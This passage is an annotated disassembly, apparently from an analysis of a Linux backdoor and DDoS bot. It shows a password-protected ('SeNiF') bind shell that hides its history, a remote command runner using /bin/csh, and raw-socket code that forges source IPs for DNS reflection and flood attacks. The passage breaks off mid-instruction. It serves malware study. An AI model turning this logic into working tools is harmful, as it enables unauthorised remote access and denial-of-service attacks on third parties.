804898a: 50 push %eax 804898b: 8d 85 28 ee ff ff lea 0xffffee28(%ebp),%eax // addr 8048991: 50 push %eax 8048992: 8b 95 38 bb ff ff mov socket_proto_b(%ebp),%edx 8048998: 52 push %edx 8048999: e8 8e e0 00 00 call accept 804899e: 89 85 34 bb ff ff mov %eax,socket_connect(%ebp) 80489a4: 83 c4 0c add $0xc,%esp // length 80489a7: 85 c0 test %eax,%eax 80489a9: 0f 84 15 01 00 00 je 0x8048ac4 80489af: e8 34 e8 00 00 call fork 80489b4: 85 c0 test %eax,%eax 80489b6: 75 cc jne 0x8048984 recv(sock_tcp,buf,0x13,0) 80489b8: 6a 00 push $0x0 // flags 80489ba: 6a 13 push $0x13 // length 80489bc: 8d 85 44 bc ff ff lea 0xffffbc44(%ebp),%eax 80489c2: 50 push %eax // buf 80489c3: 8b 8d 34 bb ff ff mov socket_connect(%ebp),%ecx 80489c9: 51 push %ecx // socket 80489ca: e8 75 e1 00 00 call recv for(ebx=0;ebx<0x13;ebx++) 80489cf: 31 db xor %ebx,%ebx 80489d1: 83 c4 10 add $0x10,%esp if((car[ebx]==0x0A)||(car[ebx]==0x0D)) 80489d4: 8a 84 2b 44 bc ff ff mov 0xffffbc44(%ebx,%ebp,1),%al 80489db: 3c 0a cmp $0xa,%al 80489dd: 74 04 je 0x80489e3 80489df: 3c 0d cmp $0xd,%al 80489e1: 75 0d jne 0x80489f0 car[ebx]=0 80489e3: c6 84 2b 44 bc ff ff movb $0x0,0xffffbc44(%ebx,%ebp,1) 80489ea: 00 80489eb: eb 11 jmp 0x80489fe 80489ed: 8d 76 00 lea 0x0(%esi),%esi else car[ebx]++; 80489f0: 88 84 2b 44 bc ff ff mov %al,0xffffbc44(%ebx,%ebp,1) 80489f7: fe 84 2b 44 bc ff ff incb 0xffffbc44(%ebx,%ebp,1) 80489fe: 43 inc %ebx 80489ff: 83 fb 12 cmp $0x12,%ebx 8048a02: 7e d0 jle 0x80489d4 Test password, strncmp(buffer,password,6) The password must be SeNiF 8048a04: 8d b5 44 bc ff ff lea 0xffffbc44(%ebp),%esi 8048a0a: bf 17 76 06 08 mov passwd,%edi 8048a0f: b9 06 00 00 00 mov $0x6,%ecx 8048a14: fc cld 8048a15: a8 00 test $0x0,%al 8048a17: f3 a6 repz cmpsb %es:(%edi),%ds:(%esi) 8048a19: 74 29 je 0x8048a44 Bad password: close(sock_tcp) 8048a1b: 6a 00 push $0x0 8048a1d: 6a 04 push $0x4 8048a1f: 68 1d 76 06 08 push $0x806761d FF FB 01 02 8048a24: 8b 95 34 bb ff ff mov socket_connect(%ebp),%edx 8048a2a: 52 push %edx 8048a2b: e8 c0 e1 00 00 call send 8048a30: 8b 8d 34 bb ff ff mov socket_connect(%ebp),%ecx 8048a36: 51 push %ecx 8048a37: e8 24 e7 00 00 call close 8048a3c: 6a 01 push $0x1 8048a3e: e8 79 d5 00 00 call exit 8048a43: 90 nop Good pwd: dup2 stdin, stdout,stderr 8048a44: 6a 00 push $0x0 8048a46: 8b 95 34 bb ff ff mov socket_connect(%ebp),%edx 8048a4c: 52 push %edx 8048a4d: e8 3a e7 00 00 call dup2 8048a52: 6a 01 push $0x1 8048a54: 8b 8d 34 bb ff ff mov socket_connect(%ebp),%ecx 8048a5a: 51 push %ecx 8048a5b: e8 2c e7 00 00 call dup2 8048a60: 6a 02 push $0x2 8048a62: 8b 95 34 bb ff ff mov socket_connect(%ebp),%edx 8048a68: 52 push %edx 8048a69: e8 1e e7 00 00 call dup2 set the environement 8048a6e: 6a 01 push $0x1 8048a70: 68 21 76 06 08 push m_PATH_in 8048a75: 68 51 76 06 08 push m_PATH 8048a7a: e8 29 18 00 00 call setenv 8048a7f: 83 c4 24 add $0x24,%esp 8048a82: 68 56 76 06 08 push m_HISTFILE 8048a87: e8 00 1a 00 00 call unsetenv 8048a8c: 6a 01 push $0x1 8048a8e: 68 5f 76 06 08 push m_TERM_linux 8048a93: 68 65 76 06 08 push m_TERM 8048a98: e8 0b 18 00 00 call setenv run the shell 8048a9d: 6a 00 push $0x0 8048a9f: 68 6a 76 06 08 push $0x806766a 8048aa4: 68 6d 76 06 08 push $0x806766d 8048aa9: e8 4e cb 00 00 call go_execve close the socket and quit 8048aae: 8b 8d 34 bb ff ff mov socket_connect(%ebp),%ecx 8048ab4: 51 push %ecx 8048ab5: e8 a6 e6 00 00 call close 8048aba: 83 c4 20 add $0x20,%esp 8048abd: 6a 00 push $0x0 8048abf: e8 f8 d4 00 00 call exit
The command send by the hacker is executed and that's all.
8048b18: 31 db xor %ebx,%ebx 8048b1a: 8d 36 lea (%esi),%esi 8048b1c: 8a 84 2b 02 f0 ff ff mov 0xfffff002(%ebx,%ebp,1),%al 8048b23: 88 84 2b 00 f0 ff ff mov %al,decrypted_data(%ebx,%ebp,1) 8048b2a: 43 inc %ebx 8048b2b: 81 fb 8d 01 00 00 cmp $0x18d,%ebx 8048b31: 7e e9 jle 0x8048b1c 8048b33: 8b 95 20 bb ff ff mov decrypted_data_ptr(%ebp),%edx 8048b39: 52 push %edx 8048b3a: 68 75 76 06 08 push $0x8067675 /bin/csh ... 8048b3f: 8d 9d 00 f8 ff ff lea buffer_sock_raw(%ebp),%ebx 8048b45: 53 push %ebx 8048b46: e8 bd 6c 00 00 call sprintf 8048b4b: 53 push %ebx 8048b4c: e8 97 cc 00 00 call system 8048b51: 6a 00 push $0x0 8048b53: e8 fc e9 00 00 call exit
This command stops the functions 4-6,9-12.
8048b58: a1 74 e7 07 08 mov pid,%eax 8048b5d: 85 c0 test %eax,%eax 8048b5f: 0f 84 53 03 00 00 je go_boucle 8048b65: 6a 09 push $0x9 8048b67: 50 push %eax 8048b68: e8 43 e7 00 00 call kill 8048b6d: c7 05 74 e7 07 08 00 movl $0x0,pid
/* Arguments: 0x08 0x0c 0x10 0x14 IP src 0x18 cpt (function 4: set to 0) 0x1C 0x20 source port 0x24 !=0 use name 0x28 name src */ 8049174: 55 push %ebp 8049175: 89 e5 mov %esp,%ebp 8049177: 81 ec 74 06 00 00 sub $0x674,%esp 804917d: 57 push %edi 804917e: 56 push %esi 804917f: 53 push %ebx Copy function argument 8049180: 8a 5d 08 mov 0x8(%ebp),%bl 8049183: 88 9d bc f9 ff ff mov %bl,param_8(%ebp) 8049189: 8a 5d 0c mov 0xc(%ebp),%bl 804918c: 88 9d b8 f9 ff ff mov %bl,param_c(%ebp) 8049192: 8a 5d 10 mov 0x10(%ebp),%bl 8049195: 88 9d b4 f9 ff ff mov %bl,param_10(%ebp) 804919b: 8a 5d 14 mov 0x14(%ebp),%bl 804919e: 88 9d b0 f9 ff ff mov %bl,param_14(%ebp) Copy DNS query length 80491a4: 8d 7d dc lea 0xffffffdc(%ebp),%edi 80491a7: be 98 76 06 08 mov $0x8067698,%esi 80491ac: fc cld 80491ad: b9 09 00 00 00 mov $0x9,%ecx 80491b2: f3 a5 repz movsl %ds:(%esi),%es:(%edi) 80491b4: c7 85 ac f9 ff ff 01 movl $0x1,0xfffff9ac(%ebp) // first_time 80491bb: 00 00 00 Copy DNS query list 80491be: 8d bd e8 fd ff ff lea 0xfffffde8(%ebp),%edi 80491c4: be bc 76 06 08 mov $0x80676bc,%esi // question list 80491c9: fc cld 80491ca: b9 7d 00 00 00 mov $0x7d,%ecx 80491cf: f3 a5 repz movsl %ds:(%esi),%es:(%edi) init data 80491d1: 8d b5 c8 f9 ff ff lea 0xfffff9c8(%ebp),%esi // IP 80491d7: 8d 9d dc f9 ff ff lea 0xfffff9dc(%ebp),%ebx // UDP 80491dd: 89 9d a4 f9 ff ff mov %ebx,0xfffff9a4(%ebp) 80491e3: 8d 9d e4 f9 ff ff lea 0xfffff9e4(%ebp),%ebx // DNS 80491e9: 89 9d a0 f9 ff ff mov %ebx,0xfffff9a0(%ebp) 80491ef: 66 c7 85 d8 fd ff ff movw $0x2,0xfffffdd8(%ebp) // addr AF_INET; 80491f6: 02 00 80491f8: 66 c7 85 da fd ff ff movw $0x0,0xfffffdda(%ebp) // port=0 80491ff: 00 00 8049201: 83 7d 18 00 cmpl $0x0,0x18(%ebp) 8049205: 74 03 je 0x804920a 8049207: ff 4d 18 decl 0x18(%ebp) get a socket 804920a: 68 ff 00 00 00 push $0xff 804920f: 6a 03 push $0x3 SOCK_RAW 8049211: 6a 02 push $0x2 INET 8049213: e8 dc da 00 00 call socket 8049218: 89 85 a8 f9 ff ff mov %eax,socket(%ebp) 804921e: 83 c4 0c add $0xc,%esp 8049221: 85 c0 test %eax,%eax 8049223: 0f 8e 1f 03 00 00 jle 0x8049548 // abort 8049229: c7 85 9c f9 ff ff 00 movl $0x0,0xfffff99c(%ebp) // cpt 8049230: 00 00 00 8049233: c7 85 98 f9 ff ff 00 movl $0x0,0xfffff998(%ebp) // has_done_resolv ? 804923a: 00 00 00 memset(ip_header,0,0x400) 804923d: 68 00 04 00 00 push $0x400 8049242: 6a 00 push $0x0 8049244: 56 push %esi 8049245: e8 1a e5 00 00 call memset 804924a: 83 c4 0c add $0xc,%esp 804924d: 8d 76 00 lea 0x0(%esi),%esi whole_circus: if 0x24, set IP src from name at 0x28 8049250: 31 ff xor %edi,%edi 8049252: 83 7d 24 00 cmpl $0x0,0x24(%ebp) 8049256: 74 5a je 0x80492b2 8049258: 83 bd 98 f9 ff ff 00 cmpl $0x0,0xfffff998(%ebp) 804925f: 7f 51 jg 0x80492b2 8049261: 8b 5d 28 mov 0x28(%ebp),%ebx 8049264: 53 push %ebx 8049265: e8 16 2d 00 00 call get_host_by_name 804926a: 89 c2 mov %eax,%edx 804926c: 83 c4 04 add $0x4,%esp 804926f: 85 d2 test %edx,%edx 8049271: 75 15 jne 0x8049288 8049273: 68 58 02 00 00 push $0x258 8049278: e8 4f c4 00 00 call seterrno_cx 804927d: bf 01 00 00 00 mov $0x1,%edi 8049282: 83 c4 04 add $0x4,%esp 8049285: eb 2b jmp 0x80492b2 8049287: 90 nop copy IP dst to buffer fffff9c4 8049288: 6a 04 push $0x4 804928a: 8d 85 c4 f9 ff ff lea 0xfffff9c4(%ebp),%eax 8049290: 50 push %eax 8049291: 8b 42 10 mov 0x10(%edx),%eax 8049294: 8b 00 mov (%eax),%eax 8049296: 50 push %eax 8049297: e8 e4 d1 00 00 call bcopy 804929c: 8b 85 c4 f9 ff ff mov 0xfffff9c4(%ebp),%eax and set IP src 80492a2: 89 46 0c mov %eax,0xc(%esi) 80492a5: c7 85 98 f9 ff ff 40 movl $0x9c40,0xfffff998(%ebp) // 40 000 80492ac: 9c 00 00 80492af: 83 c4 0c add $0xc,%esp 80492b2: 85 ff test %edi,%edi 80492b4: 75 9a jne 0x8049250 80492b6: 31 ff xor %edi,%edi // quest nbr 80492b8: c7 85 90 f9 ff ff 00 movl $0x0,0xfffff990(%ebp) // quest idx=0 80492bf: 00 00 00 80492c2: 8d 36 lea (%esi),%esi quest_next: first time ? 80492c4: 83 bd ac f9 ff ff 01 cmpl $0x1,0xfffff9ac(%ebp) 80492cb: 75 1b jne 0x80492e8 Random position in IP list 80492cd: c7 85 ac f9 ff ff 00 movl $0x0,0xfffff9ac(%ebp) 80492d4: 00 00 00 80492d7: e8 5c cb 00 00 call random 80492dc: bb 40 1f 00 00 mov $0x1f40,%ebx // 8000 80492e1: 99 cltd 80492e2: f7 fb idiv %ebx,%eax 80492e4: eb 04 jmp 0x80492ea 80492e6: 8d 36 lea (%esi),%esi 80492e8: 31 d2 xor %edx,%edx 80492ea: 83 3c 95 2c d2 06 08 cmpl $0x0,0x806d22c(,%edx,4) 80492f1: 00 80492f2: 0f 84 38 02 00 00 je 0x8049530 // next DNS req 80492f8: 8d 14 95 2c d2 06 08 lea 0x806d22c(,%edx,4),%edx 80492ff: 89 95 94 f9 ff ff mov %edx,0xfffff994(%ebp) 8049305: 8d 76 00 lea 0x0(%esi),%esi loop_ip: set IP dest in address for sendto 8049308: 8b 9d 94 f9 ff ff mov 0xfffff994(%ebp),%ebx 804930e: 8b 03 mov (%ebx),%eax 8049310: 89 85 dc fd ff ff mov %eax,0xfffffddc(%ebp) // addr.addr copy a DNS query 8049316: 8b 9d 90 f9 ff ff mov 0xfffff990(%ebp),%ebx // quest idx 804931c: 8d 94 1d e8 fd ff ff lea 0xfffffde8(%ebp,%ebx,1),%edx // query list 8049323: 8b 44 bd dc mov 0xffffffdc(%ebp,%edi,4),%eax 8049327: 50 push %eax // size 8049328: 52 push %edx // src 8049329: 8b 9d a0 f9 ff ff mov 0xfffff9a0(%ebp),%ebx // DNS 804932f: 53 push %ebx 8049330: e8 f7 d1 00 00 call memcopy 8049335: 83 c4 0c add $0xc,%esp DNS transaction id is random 8049338: e8 fb ca 00 00 call random 804933d: bb ff 00 00 00 mov $0xff,%ebx 8049342: 99 cltd 8049343: f7 fb idiv %ebx,%eax 8049345: 8b 9d a0 f9 ff ff mov 0xfffff9a0(%ebp),%ebx 804934b: 88 13 mov %dl,(%ebx) 804934d: e8 e6 ca 00 00 call random 8049352: bb ff 00 00 00 mov $0xff,%ebx 8049357: 99 cltd 8049358: f7 fb idiv %ebx,%eax 804935a: 8b 9d a0 f9 ff ff mov 0xfffff9a0(%ebp),%ebx 8049360: 88 53 01 mov %dl,0x1(%ebx) if not specified, random UDP source port 8049363: 83 7d 1c 00 cmpl $0x0,0x1c(%ebp) 8049367: 75 17 jne 0x8049380 8049369: 83 7d 20 00 cmpl $0x0,0x20(%ebp) 804936d: 75 11 jne 0x8049380 804936f: e8 c4 ca 00 00 call random 8049374: bb 30 75 00 00 mov $0x7530,%ebx 8049379: 99 cltd 804937a: f7 fb idiv %ebx,%eax 804937c: 89 d0 mov %edx,%eax 804937e: eb 0a jmp 0x804938a 8049380: 8b 45 1c mov 0x1c(%ebp),%eax 8049383: c1 e0 08 shl $0x8,%eax 8049386: 66 03 45 20 add 0x20(%ebp),%ax 804938a: 86 c4 xchg %al,%ah 804938c: 8b 9d a4 f9 ff ff mov 0xfffff9a4(%ebp),%ebx 8049392: 66 89 03 mov %ax,(%ebx) // UDP src port UDP dst port=53 8049395: 8b 9d a4 f9 ff ff mov 0xfffff9a4(%ebp),%ebx 804939b: 66 c7 43 02 00 35 movw $0x3500,0x2(%ebx) set UDP size=UDP header size (8)+size of DNS query 80493a1: 66 8b 44 bd dc mov 0xffffffdc(%ebp,%edi,4),%ax 80493a6: 66 83 c0 08 add $0x8,%ax // add UDP header 80493aa: 86 c4 xchg %al,%ah 80493ac: 66 89 43 04 mov %ax,0x4(%ebx) UDP crc = 0 80493b0: 66 c7 43 06 00 00 movw $0x0,0x6(%ebx) set IP src from IP 80493b6: 83 7d 24 00 cmpl $0x0,0x24(%ebp) 80493ba: 75 30 jne 0x80493ec 80493bc: 8a 9d bc f9 ff ff mov param_8(%ebp),%bl 80493c2: 88 9d d4 f9 ff ff mov %bl,0xfffff9d4(%ebp) 80493c8: 8a 9d b8 f9 ff ff mov param_c(%ebp),%bl 80493ce: 88 9d d5 f9 ff ff mov %bl,0xfffff9d5(%ebp) 80493d4: 8a 9d b4 f9 ff ff mov param_10(%ebp),%bl 80493da: 88 9d d6 f9 ff ff mov %bl,0xfffff9d6(%ebp) 80493e0: 8a 9d b0 f9 ff ff mov param_14(%ebp),%bl 80493e6: 88 9d d7 f9 ff ff mov %bl,0xfffff9d7(%ebp) set IP dest 80493ec: 8b 9d 94 f9 ff ff mov 0xfffff994(%ebp),%ebx 80493f2: 8b 03 mov (%ebx),%eax 80493f4: 89 46 10 mov %eax,0x10(%esi) IPv4, ip header=20 bytes 80493f7: c6 06 45 movb $0x45,(%esi) set TTL between 120 and 255 80493fa: e8 39 ca 00 00 call random 80493ff: bb 82 00 00 00 mov $0x82,%ebx 8049404: 99 cltd 8049405: f7 fb idiv %ebx,%eax 8049407: 80 c2 78 add $0x78,%dl 804940a: 88 56 08 mov %dl,0x8(%esi) IP id=random 804940d: e8 26 ca 00 00 call random 8049412: bb ff 00 00 00 mov $0xff,%ebx 8049417: 99 cltd 8049418: f7 fb idiv %ebx,%eax 804941a: 66 89 56 04 mov %dx,0x4(%esi) IP proto=0x11=UDP 804941e: c6 46 09 11 movb $0x11,0x9(%esi) IP flag=0 8049422: 66 c7 46 06 00 00 movw $0x0,0x6(%esi) IP len=dns+ip header(20)+udp header(8) 8049428: 66 8b 44 bd dc mov 0xffffffdc(%ebp,%edi,4),%ax 804942d: 66 83 c0 1c add $0x1c,%ax 8049431: 86 c4 xchg %al,%ah 8049433: 66 89 46 02 mov %ax,0x2(%esi) Calculate IP crc Initialise stored IP crc to 0 8049437: 66 c7 46 0a 00 00 movw $0x0,0xa(%esi) 804943d: ba 14 00 00 00 mov $0x14,%edx // IP header=20 8049442: 8d 9d c8 f9 ff ff lea 0xfffff9c8(%ebp),%ebx // IP 8049448: 89 9d 8c f9 ff ff mov %ebx,0xfffff98c(%ebp) 804944e: 31 c9 xor %ecx,%ecx Initialise calculated IP crc to 0 8049450: 66 c7 85 c2 f9 ff ff movw $0x0,0xfffff9c2(%ebp) 8049457: 00 00 8049459: 8d 76 00 lea 0x0(%esi),%esi 804945c: 8b 9d 8c f9 ff ff mov 0xfffff98c(%ebp),%ebx 8049462: 0f b7 03 movzwl (%ebx),%eax 8049465: 01 c1 add %eax,%ecx 8049467: 83 c3 02 add $0x2,%ebx 804946a: 89 9d 8c f9 ff ff mov %ebx,0xfffff98c(%ebp) 8049470: 83 c2 fe add $0xfffffffe,%edx //edx-=2 8049473: 83 fa 01 cmp $0x1,%edx 8049476: 7f e4 jg 0x804945c 8049478: 75 11 jne 0x804948b 804947a: 8a 03 mov (%ebx),%al 804947c: 88 85 c2 f9 ff ff mov %al,0xfffff9c2(%ebp) 8049482: 0f b7 85 c2 f9 ff ff movzwl 0xfffff9c2(%ebp),%eax 8049489: 01 c1 add %eax,%ecx 804948b: 89 ca mov %ecx,%edx 804948d: c1 fa 10 sar $0x10,%edx 8049490: 0f b7 c1 movzwl %cx,%eax 8049493: 8d 0c 10 lea (%eax,%edx,1),%ecx 8049496: 89 c8 mov %ecx,%eax 8049498: c1 f8 10 sar $0x10,%eax 804949b: 01 c1 add %eax,%ecx 804949d: 89 c8 mov %ecx,%eax 804949f: 66 f7 d0 not %ax Save the crc 80494a2: 66 89 85 c2 f9 ff ff mov %ax,0xfffff9c2(%ebp) 80494a9: 66 89 46 0a mov %ax,0xa(%esi) Send the DNS request 80494ad: 6a 10 push $0x10 /len 80494af: 8d 85 d8 fd ff ff lea 0xfffffdd8(%ebp),%eax // to 80494b5: 50 push %eax 80494b6: 6a 00 push $0x0 // flag 80494b8: 8b 44 bd dc mov 0xffffffdc(%ebp,%edi,4),%eax 80494bc: 83 c0 1c add $0x1c,%eax //len 80494bf: 50 push %eax 80494c0: 8d 85 c8 f9 ff ff lea 0xfffff9c8(%ebp),%eax // IP 80494c6: 50 push %eax 80494c7: 8b 9d a8 f9 ff ff mov socket(%ebp),%ebx // socket 80494cd: 53 push %ebx 80494ce: e8 69 d7 00 00 call sendto 80494d3: 83 c4 18 add $0x18,%esp 80494d6: 83 7d 18 00 cmpl $0x0,0x18(%ebp) // ? 80494da: 75 0c jne 0x80494e8 80494dc: 68 2c 01 00 00 push $0x12c 80494e1: e8 ca c0 00 00 call feof 80494e6: eb 1f jmp 0x8049507 80494e8: 8b 5d 18 mov 0x18(%ebp),%ebx 80494eb: 39 9d 9c f9 ff ff cmp %ebx,0xfffff99c(%ebp) // cpt 80494f1: 75 21 jne 0x8049514 80494f3: 68 2c 01 00 00 push $0x12c 80494f8: e8 b3 c0 00 00 call feof 80494fd: c7 85 9c f9 ff ff 00 movl $0x0,0xfffff99c(%ebp) // cpt=0 8049504: 00 00 00 8049507: ff 8d 98 f9 ff ff decl 0xfffff998(%ebp) 804950d: 83 c4 04 add $0x4,%esp 8049510: eb 08 jmp 0x804951a 8049512: 8d 36 lea (%esi),%esi 8049514: ff 85 9c f9 ff ff incl 0xfffff99c(%ebp) //cpt++ next IP dest in IP list 804951a: 83 85 94 f9 ff ff 04 addl $0x4,0xfffff994(%ebp) 8049521: 8b 9d 94 f9 ff ff mov 0xfffff994(%ebp),%ebx 8049527: 83 3b 00 cmpl $0x0,(%ebx) 804952a: 0f 85 d8 fd ff ff jne 0x8049308 // loop_ip No more IP, restart with next DNS request 8049530: 83 85 90 f9 ff ff 32 addl $0x32,0xfffff990(%ebp) // add size of a quest 8049537: 47 inc %edi 8049538: 83 ff 08 cmp $0x8,%edi // nbr of quest 804953b: 0f 8e 83 fd ff ff jle 0x80492c4 // jle quest_next end of while(1) 8049541: e9 0a fd ff ff jmp 0x8049250 8049546: 8d 36 lea (%esi),%esi pid=0; return 0; 8049548: c7 05 74 e7 07 08 00 movl $0x0,pid 804954f: 00 00 00 8049552: 31 c0 xor %eax,%eax 8049554: 8d a5 80 f9 ff ff lea 0xfffff980(%ebp),%esp 804955a: 5b pop %ebx 804955b: 5e pop %esi 804955c: 5f pop %edi 804955d: 89 ec mov %ebp,%esp 804955f: 5d pop %ebp 8049560: c3 ret 8049561: 8d 76 00 lea 0x0(%esi),%esi
This function is very similar to the previous one. Instead of querying server from a list, it floods a DNS with repeted DNS queries.
8049564: 55 push %ebp 8049565: 89 e5 mov %esp,%ebp 8049567: 81 ec 8c 06 00 00 sub $0x68c,%esp 804956d: 57 push %edi 804956e: 56 push %esi 804956f: 53 push %ebx Copy function argument 8049570: 8a 5d 08 mov 0x8(%ebp),%bl 8049573: 88 9d ac f9 ff ff mov %bl,IP_dst_0(%ebp) // IP dst 8049579: 8a 5d 0c mov 0xc(%ebp),%bl 804957c: 88 9d a8 f9 ff ff mov %bl,IP_dst_1(%ebp) 8049582: 8a 5d 10 mov 0x10(%ebp),%bl 8049585: 88 9d a4 f9 ff ff mov %bl,IP_dst_2(%ebp) 804958b: 8a 5d 14 mov 0x14(%ebp),%bl 804958e: 88 9d a0 f9 ff ff mov %bl,IP_dst_3(%ebp) 8049594: 8a 5d 18 mov 0x18(%ebp),%bl 8049597: 88 9d 9c f9 ff ff mov %bl,IP_src_0(%ebp) 804959d: 8a 5d 1c mov 0x1c(%ebp),%bl 80495a0: 88 9d 98 f9 ff ff mov %bl,IP_src_1(%ebp) 80495a6: 8a 5d 20 mov 0x20(%ebp),%bl 80495a9: 88 9d 94 f9 ff ff mov %bl,IP_src_2(%ebp) 80495af: 8a 5d 24 mov 0x24(%ebp),%bl 80495b2: 88 9d 90 f9 ff ff mov %bl,IP_src_3(%ebp) Copy DNS query length 80495b8: 8d 7d dc lea 0xffffffdc(%ebp),%edi 80495bb: be 98 76 06 08 mov $0x8067698,%esi 80495c0: fc cld 80495c1: b9 09 00 00 00 mov $0x9,%ecx 80495c6: f3 a5 repz movsl %ds:(%esi),%es:(%edi) Copy DNS query list 80495c8: 8d bd e8 fd ff ff lea 0xfffffde8(%ebp),%edi 80495ce: be bc 76 06 08 mov $0x80676bc,%esi // question list 80495d3: fc cld 80495d4: b9 7d 00 00 00 mov $0x7d,%ecx 80495d9: f3 a5 repz movsl %ds:(%esi),%es:(%edi) init data 80495db: 8d bd d8 f9 ff ff lea 0xfffff9d8(%ebp),%edi // IP 80495e1: 8d 9d ec f9 ff ff lea 0xfffff9ec(%ebp),%ebx // UDP 80495e7: 89 9d 88 f9 ff ff mov %ebx,0xfffff988(%ebp) 80495ed: 8d 9d f4 f9 ff ff lea 0xfffff9f4(%ebp),%ebx // DNS 80495f3: 89 9d 84 f9 ff ff mov %ebx,0xfffff984(%ebp) 80495f9: 66 c7 85 d8 fd ff ff movw $0x2,0xfffffdd8(%ebp) // addr.AF_INET 8049600: 02 00 8049602: 66 c7 85 da fd ff ff movw $0x0,0xfffffdda(%ebp) //port =0 8049609: 00 00 use name ? 804960b: 83 7d 34 00 cmpl $0x0,0x34(%ebp) 804960f: 75 34 jne 0x8049645 set destination IP 8049611: 0f b6 85 a0 f9 ff ff movzbl IP_dst_3(%ebp),%eax 8049618: 50 push %eax 8049619: 0f b6 85 a4 f9 ff ff movzbl IP_dst_2(%ebp),%eax 8049620: 50 push %eax 8049621: 0f b6 85 a8 f9 ff ff movzbl IP_dst_1(%ebp),%eax 8049628: 50 push %eax 8049629: 0f b6 85 ac f9 ff ff movzbl IP_dst_0(%ebp),%eax 8049630: 50 push %eax 8049631: 68 8a 76 06 08 push $format_ip %d.%d.%d.%d 8049636: 8d 85 b8 f9 ff ff lea 0xfffff9b8(%ebp),%eax // IP 804963c: 50 push %eax 804963d: e8 c6 61 00 00 call sprintf 8049642: 83 c4 18 add $0x18,%esp 8049645: 83 7d 28 00 cmpl $0x0,0x28(%ebp) 8049649: 74 03 je 0x804964e 804964b: ff 4d 28 decl 0x28(%ebp) get a RAW socket 804964e: 68 ff 00 00 00 push $0xff 8049653: 6a 03 push $0x3 SOCK_RAW 8049655: 6a 02 push $0x2 INET 8049657: e8 98 d6 00 00 call socket 804965c: 89 85 8c f9 ff ff mov %eax,socket(%ebp) 8049662: 83 c4 0c add $0xc,%esp 8049665: 85 c0 test %eax,%eax 8049667: 0f 8e 6b 03 00 00 jle 0x80499d8 // abort 804966d: c7 85 80 f9 ff ff 00 movl $0x0,cpt(%ebp) // cpt 8049674: 00 00 00 8049677: c7 85 7c f9 ff ff 00 movl $0x0,0xfffff97c(%ebp) 804967e: 00 00 00 memset(ip_header,0,0x400) 8049681: 68 00 04 00 00 push $0x400 8049686: 6a 00 push $0x0 8049688: 57 push %edi 8049689: e8 d6 e0 00 00 call memset 804968e: 83 c4 0c add $0xc,%esp 8049691: 8d 76 00 lea 0x0(%esi),%esi if 0x34, set IP src from name at 0x38 8049694: 31 f6 xor %esi,%esi 8049696: 83 7d 34 00 cmpl $0x0,0x34(%ebp) 804969a: 74 60 je 0x80496fc 804969c: 83 bd 7c f9 ff ff 00 cmpl $0x0,0xfffff97c(%ebp) 80496a3: 7f 57 jg 0x80496fc 80496a5: 8b 5d 38 mov 0x38(%ebp),%ebx // nom 80496a8: 53 push %ebx 80496a9: e8 d2 28 00 00 call get_host_by_name 80496ae: 89 c2 mov %eax,%edx 80496b0: 83 c4 04 add $0x4,%esp 80496b3: 85 d2 test %edx,%edx 80496b5: 75 15 jne 0x80496cc 80496b7: 68 58 02 00 00 push $0x258 80496bc: e8 0b c0 00 00 call seterrno_cx 80496c1: be 01 00 00 00 mov $0x1,%esi 80496c6: 83 c4 04 add $0x4,%esp 80496c9: eb 31 jmp 0x80496fc 80496cb: 90 nop copy IP dst to buffer fffff9c4 80496cc: 6a 04 push $0x4 80496ce: 8d 85 b4 f9 ff ff lea 0xfffff9b4(%ebp),%eax // IP 80496d4: 50 push %eax 80496d5: 8b 42 10 mov 0x10(%edx),%eax 80496d8: 8b 00 mov (%eax),%eax 80496da: 50 push %eax 80496db: e8 a0 cd 00 00 call bcopy set IP src from name 80496e0: 8b 85 b4 f9 ff ff mov 0xfffff9b4(%ebp),%eax 80496e6: 89 47 10 mov %eax,0x10(%edi) 80496e9: 89 85 dc fd ff ff mov %eax,0xfffffddc(%ebp) 80496ef: c7 85 7c f9 ff ff 40 movl $0x9c40,0xfffff97c(%ebp) 80496f6: 9c 00 00 80496f9: 83 c4 0c add $0xc,%esp if 0x34(%ebp)==0, use given IP instead of name 80496fc: 85 f6 test %esi,%esi 80496fe: 75 94 jne 0x8049694 8049700: 31 f6 xor %esi,%esi 8049702: 89 ad 78 f9 ff ff mov %ebp,0xfffff978(%ebp) 8049708: 83 7d 34 00 cmpl $0x0,0x34(%ebp) 804970c: 75 15 jne 0x8049723 804970e: 8d 85 b8 f9 ff ff lea 0xfffff9b8(%ebp),%eax // IP 8049714: 50 push %eax 8049715: e8 72 37 00 00 call inet_addr 804971a: 89 85 dc fd ff ff mov %eax,0xfffffddc(%ebp) 8049720: 83 c4 04 add $0x4,%esp copy a DNS query 8049723: 8b 95 78 f9 ff ff mov 0xfffff978(%ebp),%edx 8049729: 81 c2 e8 fd ff ff add $0xfffffde8,%edx // DNS query list 804972f: 8b 44 b5 dc mov 0xffffffdc(%ebp,%esi,4),%eax // size of query 8049733: 50 push %eax 8049734: 52 push %edx 8049735: 8b 9d 84 f9 ff ff mov 0xfffff984(%ebp),%ebx 804973b: 53 push %ebx 804973c: e8 eb cd 00 00 call memcopy 8049741: 83 c4 0c add $0xc,%esp DNS transaction id is random 8049744: e8 ef c6 00 00 call random 8049749: bb ff 00 00 00 mov $0xff,%ebx 804974e: 99 cltd 804974f: f7 fb idiv %ebx,%eax 8049751: 8b 9d 84 f9 ff ff mov 0xfffff984(%ebp),%ebx 8049757: 88 13 mov %dl,(%ebx) 8049759: e8 da c6 00 00 call random 804975e: bb ff 00 00 00 mov $0xff,%ebx 8049763: 99 cltd 8049764: f7 fb idiv %ebx,%eax 8049766: 8b 9d 84 f9 ff ff mov 0xfffff984(%ebp),%ebx 804976c: 88 53 01 mov %dl,0x1(%ebx) if not specified, random UDP source port 804976f: 83 7d 2c 00 cmpl $0x0,0x2c(%ebp) 8049773: 75 17 jne 0x804978c 8049775: 83 7d 30 00 cmpl $0x0,0x30(%ebp) 8049779: 75 11 jne 0x804978c 804977b: e8 b8 c6 00 00 call random 8049780: bb 30 75 00 00 mov $0x7530,%ebx 8049785: 99 cltd 8049786: f7 fb idiv %ebx,%eax 8049788: 89 d0 mov %edx,%eax 804978a: eb 0a jmp 0x8049796 804978c: 8b 45 2c mov 0x2c(%ebp),%eax 804978f: c1 e0 08 shl $0x8,%eax 8049792: 66 03 45 30 add 0x30(%ebp),%ax 8049796: 86 c4 xchg %al,%ah 8049798: 8b 9d 88 f9 ff ff mov 0xfffff988(%ebp),%ebx 804979e: 66 89 03 mov %ax,(%ebx) // src port UDP dst port=53 80497a1: 8b 9d 88 f9 ff ff mov 0xfffff988(%ebp),%ebx 80497a7: 66 c7 43 02 